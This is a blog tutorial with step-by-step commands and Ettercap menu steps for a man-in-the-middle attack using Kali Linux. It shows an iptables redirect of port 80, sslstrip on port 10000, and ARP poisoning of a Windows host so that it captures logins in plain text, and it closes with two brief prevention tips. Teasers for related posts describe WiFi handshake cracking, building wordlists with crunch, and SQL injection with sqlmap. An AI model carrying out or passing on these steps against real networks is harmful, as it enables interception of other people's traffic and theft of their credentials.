Skip to main content

Man-In-The-Middle(MITM) Attack Using Kali Linux



Tools Used:- Kali Linux, SSL Strip, Wireshark, Ettercap
A MITM is a kind of cyber attack where a hacker/attacker compromises your network and starts redirecting all the network traffic through his own device. The hacker can see all your browsing information like your Passwords, Usernames, Emails, and even the messages you’re sending across.
These kinds of attack don’t tend to work with a website using “HTTPS.” But, with a tool like SSLstrip, it can easily strip the user “https” back to “http”. This means the attack will get your information in plain text.

 Step1: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Go to terminal and type the command mentioned above. It will redirect Traffic port 80 to 10000

 Step2: iptables -L -t nat

 Step3: Open SSLstrip

 Step4: Launch Wireshark and select interface eth0

 Step5: sslstrip -l 10000
This step enables to listen to port 10000. -l in the command enables listening mode.

 Step6: Run Ettercap

 Sniffing->unified
Hosts-> View Hosts
Target1-> windows ipaddress , Target2-> something ending with .2

 Step7: View Targets/ Target Lists

 Step8: Arp Poisioning-> Sniff remote connections
Step9: Start Sniffing
The result will be obtained in a similar manner once the user will try to log into any site through a browser. As seen in the picture above the username and password will be displayed once the .user will login

Basic Ways to Prevent MITM Attack

  • Always check if a site is using “https”.  If the site does use “https,” and it automatically changes to “http”, know there’s a “MITMA” happening on the network.
  • Don’t share your WiFi password with people you don’t know or trust. Cause information tend to be not encrypted inside the same network, hence all the information can be easily seen. 
Labels:

Comments

Post a Comment

Popular posts from this blog

Wireless /Wifi(WEP/WPA/WPA2) Password Cracking Using Dictionary Attack With Aircrack-ng (Kali Linux)

Tools Used:-Aircrack-ng In the present context of networking, WEP is not used cause it is the weakest and easy to crack through the network. WEP/WPA2 are the most used encryption tools to secure the wireless connection.   The most common way of getting past or cracking through WEP and WPA secured wireless connection is through the use of captured handshake. When you want to hack wifi, you need to capture “handshake”. The handshake is the connection of personal computer and wireless network, it is when network packet and personal computer packets meet each other. If you capture handshake then with a handshake you do not need to be in wifi range anymore, you can hack password with handshake and wifi name. Now you need to capture all the packets that are sent through the wifi router and all personal computers in the network . Step1: airmon-ng  This step is done before anything else is done in order to know your wifi interface name. Check the running process and  ...
1 comment
Read more

Making Own Dictionary Using Crunch Commands For Dictionary Attack (Kali linux Tool)

Making own dictionary from words not listed in the normal English dictionary can be helpful specially for people who want to crack passwords based on some person's name, surname or native language words( Example Nepali word, Hindi Word etc). Since most of the word list that are used to hack into a system or crack passwords contain words from English dictionary, passwords such as name of person, surname of person, pet-name and specially words of native language aren't included in that word list as they aren't defined in the English dictionary. This is one the most crucial drawback of dictionary attack. Apart from selective words problem, dictionary attacks usually take lot of time cause they attempt all the words present in the word-list as passwords to crack the authentication system. If we make our own dictionary then it will also help in saving time. But making our own dictionary can only be helpful to only those people who have a hint to what the password might be an...
1 comment
Read more

SQL Injection Attack Using SQLMAP Tool In Kali Linux

In current context of digitized  world where everything is done over internet, lot of information can be found online. The data can either be private to people or can be public to everyone with no privacy. Everyday lots of data are getting stored in different databases of different websites throughout the world and it is becoming harder to store and protect the data from evasion at the same time. Unauthorized access to such databases can lead to leak of large amount of confidential information related to a person or even an organization. Hackers tend to steal a lot of information through such database by getting either getting authorized or unauthorized access. One of the most common method to get an access to the information's available in a websites database is SQL injection based attacks.  SQL Injection is a type of an  injection  attack that makes it possible to execute malicious SQL Statements.  With the right set of queries, a user can gain access, u...
Post a Comment
Read more